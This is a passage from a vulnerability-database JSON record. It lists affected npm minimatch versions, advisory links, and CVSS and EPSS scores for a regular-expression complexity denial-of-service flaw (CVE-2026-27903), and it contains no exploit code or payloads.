}, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909389?format=api", "purl": "pkg:npm/minimatch@7.4.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/62797?format=api", "purl": "pkg:npm/minimatch@7.4.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/67893?format=api", "purl": "pkg:npm/minimatch@8.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909390?format=api", "purl": "pkg:npm/minimatch@8.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909391?format=api", "purl": "pkg:npm/minimatch@8.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909392?format=api", "purl": "pkg:npm/minimatch@8.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909393?format=api", "purl": "pkg:npm/minimatch@8.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/62796?format=api", "purl": "pkg:npm/minimatch@8.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/67894?format=api", "purl": "pkg:npm/minimatch@9.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909394?format=api", "purl": "pkg:npm/minimatch@9.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909395?format=api", "purl": "pkg:npm/minimatch@9.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909396?format=api", "purl": "pkg:npm/minimatch@9.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909397?format=api", "purl": "pkg:npm/minimatch@9.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909398?format=api", "purl": "pkg:npm/minimatch@9.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/62794?format=api", "purl": "pkg:npm/minimatch@9.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/67895?format=api", "purl": "pkg:npm/minimatch@10.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909399?format=api", "purl": "pkg:npm/minimatch@10.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909400?format=api", "purl": "pkg:npm/minimatch@10.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909401?format=api", "purl": "pkg:npm/minimatch@10.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909402?format=api", "purl": "pkg:npm/minimatch@10.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909403?format=api", "purl": "pkg:npm/minimatch@10.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909404?format=api", "purl": "pkg:npm/minimatch@10.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909405?format=api", "purl": "pkg:npm/minimatch@10.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909406?format=api", "purl": "pkg:npm/minimatch@10.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/62793?format=api", "purl": "pkg:npm/minimatch@10.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/917696?format=api", "purl": "pkg:npm/minimatch@10.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.2" } ], "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27903.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27903.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27903", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05373", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05286", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05318", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05339", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07489", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07501", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07578", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07523", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07591", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07603", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07605", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07554", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07577", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.0763", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10679", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10405", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10542", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10609", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10588", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.1063", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27903" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27903", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27903" }, { "reference_url": "https://github.com/isaacs/minimatch", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/minimatch" }, { "reference_url": "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748" }, { "reference_url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T19:20:40Z/" } ], "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095", "reference_id": "1129095", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442919", "reference_id": "2442919", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442919" }, { "reference_url": "https://github.com/advisories/GHSA-7r86-cg39-jmmj", "reference_id": "GHSA-7r86-cg39-jmmj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7r86-cg39-jmmj" } ], "weaknesses": [ { "cwe_id": 407, "name": "Inefficient Algorithmic Complexity", "description": "An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." }, { "cwe_id": 1333, "name": "Inefficient Regular Expression Complexity", "description": "The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles." } ], "exploits": [], "severity_range_score": "5.9 - 8.9", "exploitability": "0.5", "weighted_severity": "8.0", "risk_score": 4.0, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q6uh-59pj-rfdp" }